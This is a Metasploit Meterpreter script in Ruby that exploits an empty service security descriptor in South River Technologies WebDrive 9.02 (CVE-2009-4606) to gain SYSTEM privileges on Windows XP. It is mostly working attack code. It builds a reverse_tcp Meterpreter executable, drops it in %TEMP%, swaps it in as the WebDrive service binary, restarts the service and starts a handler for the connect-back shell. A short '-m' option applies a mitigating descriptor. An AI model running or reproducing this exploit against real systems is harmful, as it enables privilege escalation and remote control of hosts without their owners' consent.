### South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.##This module exploits a privilege escalation vulnerability in South River Technologies WebDrive. #Due to an empty security descriptor, a local attacker can gain elevated privileges.#Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.#Vulnerability mitigation featured.##Credit:# - Discovery - Nine:Situations:Group::bellick# - Meterpreter script - Trancer##References:# - http://retrogod.altervista.org/9sg_south_river_priv.html# - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/# - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606# - http://osvdb.org/show/osvdb/59080##mtrancer[@]gmail.com#http://www.rec-sec.com#### Options#
opts = Rex::Parser::Arguments.new("-h"=> [ false,"This help menu"],"-m"=> [ false,"Mitigate"],"-r"=> [ true,"The IP of the system running Metasploit listening for the connect back"],"-p"=> [ true,"The port on the remote host where Metasploit is listening"])## Default parameters#
rhost = Rex::Socket.source_address("1.2.3.4")
rport = 4444
sname = 'WebDriveService'
pname = 'wdService.exe'## Option parsing#
opts.parse(args)do|opt, idx, val|
case opt
when "-h"
print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
print_line(opts.usage)
raise Rex::Script::Completed
when "-m"
client.sys.process.get_processes().each do|m|if( m['name'] == pname )
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")# Set correct service security descriptor to mitigate the vulnerability
print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})endend
raise Rex::Script::Completed
when "-r"
rhost = val
when "-p"
rport = val.to_i
endend
client.sys.process.get_processes().each do|m|if( m['name'] == pname )
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")# Build out the exe payload.
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw= pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)# Place our newly created exe in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempexe = tempdir +"\\"+ Rex::Text.rand_text_alpha((rand(8)+6))+".exe"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe,"wb")
fd.write(exe)
fd.close
# Stop the vulnerable service
print_status("Stopping service \"#{sname}\"...")
client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})# Set exe payload as service binpath
print_status("Setting \"#{sname}\" to #{tempexe}...")
client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})sleep(1)# Restart the service
print_status("Restarting the \"#{sname}\" service...")
client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})# Our handler to recieve the callback.
handler = client.framework.exploits.create("multi/handler")
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
handler.datastore['LHOST'] = rhost
handler.datastore['LPORT'] = rport
handler.datastore['ExitOnSession'] = false
handler.exploit_simple('Payload' => handler.datastore['PAYLOAD'],'RunAsJob' => true
)# Set service binpath back to normal
client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})endend
